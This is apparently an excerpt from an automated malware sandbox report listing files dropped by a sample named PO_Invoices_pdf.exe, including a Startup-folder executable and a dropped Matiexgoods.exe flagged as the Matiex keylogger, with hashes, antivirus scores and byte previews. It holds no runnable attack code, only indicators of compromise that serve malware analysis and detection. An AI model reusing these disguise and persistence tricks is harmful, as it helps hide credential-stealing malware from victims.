                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7646
                                                                                                  Entropy (8bit):3.6935655205790683
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNie3696YaD36XLgmfZSnS/ZCp17nX1ffJm:RrlsNi+696Yc36XLgmfInS/A7nlfs
                                                                                                  MD5:B831102B11FA3395D755D1BB81097289
                                                                                                  SHA1:11843E55B390CE8A5FAD48F342F244C938FF4B1A
                                                                                                  SHA-256:C765D0D67F63F562E8E3817D0513C0FA99456485788DCA02DC80E33D4538747D
                                                                                                  SHA-512:18ECA65B3A6C624CC9A23C9CF96550CFBBD5D08784D973E342D7DD0D244B640E4A36A0D86B22896D8747C168AE0286084AC23840FE44F89C35A67F2D333ABAD5
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.2.4.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7473.tmp.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4678
                                                                                                  Entropy (8bit):4.444767498901979
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsCJgtWI9HnWSC8Bxk8fm8M4JFKqJFx+q8vv9/URyHzd:uITfQoWSNTJJFKsKlcRyHzd
                                                                                                  MD5:5CF35384506171C76D238D23345102E5
                                                                                                  SHA1:2AD1BF4FCD9C1D89B39F4F1FF1D5EA58FDBF6B1A
                                                                                                  SHA-256:A5F959079EDED28B1CFBBAF95E51A355666A142A81565719D9BF2F2F7662BEDD
                                                                                                  SHA-512:D690E05F2D00A5FDF49829F1DC1C43552A91D3A40DA8109B53302058211CB5A3FD1EA4C4D59C1397FD74833972ED29AC99E716E969682AD2E4FE92BE816EF56E
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER81AC.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7646
                                                                                                  Entropy (8bit):3.693579069726026
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNiJ5z6ZcJ6YQK6AgmfZSnS/ZCp1sc1fbkm:RrlsNiHz6M6YV6AgmfInS/Asmfd
                                                                                                  MD5:3A508C183E8DBAAD5D3D8713B56F9361
                                                                                                  SHA1:EDFA7FE427707929A6A6DDD1EB0F3DDF3BEF18F7
                                                                                                  SHA-256:23CA4EDA7A443492D22C975864EBFB9D0465DBAD4417390EF4F7FA36B5ECF537
                                                                                                  SHA-512:5CE0BDCDA608DBD7757226268407E053148AE9B88329656B566BEBC651158048859EBF03A48B1DAC9BE380F53A32BAC3A1812753ED269A80491FFF274BB80107
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8566.tmp.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4678
                                                                                                  Entropy (8bit):4.444768514534563
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsJJgtWI9HnWSC8Bcs8fm8M4JFKqJFY2+q8vvp/URyHDd:uITfboWSNqRJFKIKxcRyHDd
                                                                                                  MD5:5A22E2B7CEDA2DCE82BD29C8364400C6
                                                                                                  SHA1:517E131B4D1A984B5D79E041EE6E823CB85B771C
                                                                                                  SHA-256:FBBC0C2B8668F47624704691F6B1D3637C4FEB80B191B86781C760557D98B973
                                                                                                  SHA-512:2CEEBEA847BAB89C2F152F6A0A007E2793656F68E736A03D28386F374B621B2EDF4A10680194E1F3D5A4031B6DD96CFA5D02D8A330383A9BD6B3CEFB40B063AA
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843963" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF48.tmp.mdmp
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Feb 2 16:52:18 2021, 0x60521 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6824818
                                                                                                  Entropy (8bit):4.735635134294259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:EaauHsiIP9H6hIb1Xa73vlirFYuerqFpCqkJpljZcsZccO:LxHsiIP9H469BXYfZc1
                                                                                                  MD5:CC42182766C160A4269CBC0CB6DD537A
                                                                                                  SHA1:2123EFAF6B085E889046DB5EFAA87A1A3BE29652
                                                                                                  SHA-256:AAC3FBCFE568BD68FC4B213308FF5C593EE3AAB47FC2C9447754239579E838B5
                                                                                                  SHA-512:7561C17ECED613BCF3D4026BBB25000CBC440F46EF912EB8AE6934EDED5793B0564C17EC254AE89D7B04CF7D347DCEA782354648D235A90ED3068F3FDCBD7471
                                                                                                  Malicious:false
                                                                                                  Preview: MDMP....... .......B..`!..................U...........B.......3......GenuineIntelW...........T...........#..`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD020.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6346
                                                                                                  Entropy (8bit):3.726879109228151
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNier6hY0SwZCpr+89bJnvsfNjm:RrlsNiq6hY0SwWJnUf0
                                                                                                  MD5:859C2D09E985859C05BA524E847AE1F7
                                                                                                  SHA1:D77BC6804E32D6EA7001D46678CCA826F5E68F68
                                                                                                  SHA-256:6DB7AAEE60D7D508523C3BA1B51655E0707872B4BE51B8CFBC88A401CF1DA410
                                                                                                  SHA-512:9C1439031B122D8ED9361117E3B095D7E1335C0038463AF84886873B8B543D36081056ADA864C8C42A165B851F590D079473962B5C3B92D05BC0D9C207E8F1D6
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.2.4.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD84E.tmp.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4658
                                                                                                  Entropy (8bit):4.484771487000801
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsCJgtWI9HnWSC8BN8fm8M4JUkZFK+q84UN/URyHAd:uITfQoWSNAJJOoNcRyHAd
                                                                                                  MD5:9363D872E68ACC797390D6712DA8521C
                                                                                                  SHA1:A04E6EAEC66ECA386CBE020130B59BD71172009F
                                                                                                  SHA-256:73F1FD36F750B4FD1E3B300530421BC897887B4B3D3BFE85C6893B3C0341F4C4
                                                                                                  SHA-512:43CFE15E426B91B113B4E3B109BA0C4030F623CF356D7D4D66DB849A989390EBFFD9C770824B21BB42D0DC0BE54251039A2678920F8851631652EE0AFF7878E8
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDB6.tmp.mdmp
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Feb 2 16:53:45 2021, 0x60521 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6791614
                                                                                                  Entropy (8bit):4.742421345206189
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:xAMauM2xID9H+h1b1XaoDvliXnlYuernx5AqJplvzcnsccD:xdxM2xID9HUMndYpDzcS
                                                                                                  MD5:722E8E235CF8F1D7BFAE5DC73782C39E
                                                                                                  SHA1:8E0E4C0332FE09017117C69966D39BFF3D93BE0F
                                                                                                  SHA-256:87CCC6BF059F6DF8C5EE9B7872438410BB30C6D104B2E7BF5B9230BCE8850A9B
                                                                                                  SHA-512:E14A7BE8D7C59D1833DE5C15B69CDAF76586A2DF0CBC2B930702B7D4B34B8C8DAB1E408BEB07117B2E1BE777FBA5E69A696E42BA42FA18767A890A16FA7EBC04
                                                                                                  Malicious:false
                                                                                                  Preview: MDMP....... ..........`!..................U...........B......H3......GenuineIntelW...........T.......@...g..`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\I$s#$lT3ssl.exe.log
                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1406
                                                                                                  Entropy (8bit):5.34928936000881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr74E4KnKDE4KhK3VZ9pKhPKIE4oKFKHKorE4J:MIHK5HKXE1qHbHK5AHKzv4HKnYHKhQnp
                                                                                                  MD5:E26C2069017DA08B1891F176C3FCBB5B
                                                                                                  SHA1:372337FEB1999D2CF9E2CDF4AF964905B6EE025A
                                                                                                  SHA-256:A00F43B55E3A712364B3F1F3A8C0DE7B291111960CAC301A34544666E812E5F9
                                                                                                  SHA-512:F13A01B88578FC81453B4C8389C91237414CF2D95CCFD76FE2291E973C86EFA23192C916FD832802054BFC0B2EE72F6ABD7B057BADF98750C381F32115259F9C
                                                                                                  Malicious:false
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Data.DataSetExtensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"Sy
                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_Invoices_pdf.exe.log
                                                                                                  Process:C:\Users\user\Desktop\PO_Invoices_pdf.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1406
                                                                                                  Entropy (8bit):5.34928936000881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr74E4KnKDE4KhK3VZ9pKhPKIE4oKFKHKorE4J:MIHK5HKXE1qHbHK5AHKzv4HKnYHKhQnp
                                                                                                  MD5:E26C2069017DA08B1891F176C3FCBB5B
                                                                                                  SHA1:372337FEB1999D2CF9E2CDF4AF964905B6EE025A
                                                                                                  SHA-256:A00F43B55E3A712364B3F1F3A8C0DE7B291111960CAC301A34544666E812E5F9
                                                                                                  SHA-512:F13A01B88578FC81453B4C8389C91237414CF2D95CCFD76FE2291E973C86EFA23192C916FD832802054BFC0B2EE72F6ABD7B057BADF98750C381F32115259F9C
                                                                                                  Malicious:true
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Data.DataSetExtensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"Sy
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8701
                                                                                                  Entropy (8bit):4.879861859938857
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:cdcU6Clib4oxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smii:cib4NBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                  MD5:E16560503ABB03E8D3A60D67C80E53CB
                                                                                                  SHA1:228496AC44B81BD035E5DAFA6C7298EAC436DBED
                                                                                                  SHA-256:B025E6D38777D7FFC9483E7EFBA2D0DA9766C99113E3441FE56D40A10B85D9D3
                                                                                                  SHA-512:7C0B791A504C1B666C9350A018A2E59C950CABE10832EEEBF88C47784908E8DBE09490E5F9D0A11A05E1200515BB8321E5730E3710EB79633661ED2006F57835
                                                                                                  Malicious:false
                                                                                                  Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command..
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19636
                                                                                                  Entropy (8bit):5.5609303136217765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Et9+XHq0/usaSD01KRYSBKnTYw5Q9QRbp6cQcpPTDEiqWJI5jw:dBaSDS4KTYwO9q8Rs4zWJl
                                                                                                  MD5:E1EFC42BE4A9B9F0A579636314EE85AD
                                                                                                  SHA1:4AE90D27313085028D6E5643B45AC2D15F2E1882
                                                                                                  SHA-256:ABD22A8C7A2F2330B6A3FDD328D07097B1B4494E60C41D9150FF105F93B1D3B7
                                                                                                  SHA-512:F524E684CF1C7A51441A9873A0FFB35C3C205C5159A5C9989EEE36A63C25E0ABB849E667E5D54072986CFF428766B3AD45F8697CC6805DFC39A11101C6FB6943
                                                                                                  Malicious:false
                                                                                                  Preview: @...e.......................].N.N....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Z.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                  C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):455680
                                                                                                  Entropy (8bit):5.4156534240521
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:L09yLLuWoujzz/DCBGNv5lToO7OsWXiOV:L09yLyWoujHDX5QO7OvXik
                                                                                                  MD5:80C61B903400B534858D047DD0919F0E
                                                                                                  SHA1:D0AB5400B74392308140642C75F0897E16A88D60
                                                                                                  SHA-256:25ADE9899C000A27570B527CFFC938EC9626978219EC8A086082B113CBE4F492
                                                                                                  SHA-512:B3216F0E4E95C7F50BCCBA5FDCCA2AD622A42379383BE855546FA1E0BAC41A6BEEA8226F8634AD5E0D8596169E0443494018BBE70B7052F094402AECAA038BCE
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious, Browse
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................~.... ... ....@.. .......................`............@.................................$...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............x..........x'...h.....................................................................................................................................................................RNK\ZJO@F.EYC.G.IOYKJ._R_CEESEPPlj}ez|"hzfSn`ssdh~DNwq//M\`tdv`|..;.....4......Ewqus._/.....V>..%9%(:&##b?`LLJN.56(,*:.}.2=4lwY_.............................................................................................................A.{YOLI..qAL.tTDY^..v^NY
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4e14qwxc.os0.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awkr53h0.pdr.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
